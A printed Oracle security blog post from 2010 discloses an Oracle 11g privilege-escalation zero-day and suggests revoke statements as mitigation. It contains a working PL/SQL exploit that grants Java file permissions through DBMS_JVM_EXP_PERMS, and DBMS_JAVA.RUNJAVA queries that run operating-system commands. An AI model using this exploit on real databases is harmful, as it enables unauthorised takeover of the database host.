- Alexander Kornbrust Oracle Security Blog - http://blog.red-database-security.com -
Oracle 11g 0day exploit published
Dieser Eintrag stammt von Alexander Kornbrust Am 4 Feb 2010 @ 22:27 In Exploit, David Litchfield | Kommentarfunktion deaktiviert
I just read on Sumit Siddarth’s (Sid) [1] blog that the video recording from David Litchfield’s BH presentation is [2] online.
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);
Dieser Artikel wurde ausgedruckt ab Alexander Kornbrust Oracle Security Blog: http://blog.red-database-security.com
URL zum Artikel: http://blog.red-database-security.com/2010/02/04/oracle-11g-0day-exploit-published/
URLs in this post:
[1] blog: http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/
[2] online: http://blog.red-database-security.comhttps://media.blackhat.com/bh-dc-10/video/L
itchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov
Klicken hier zum Drucken.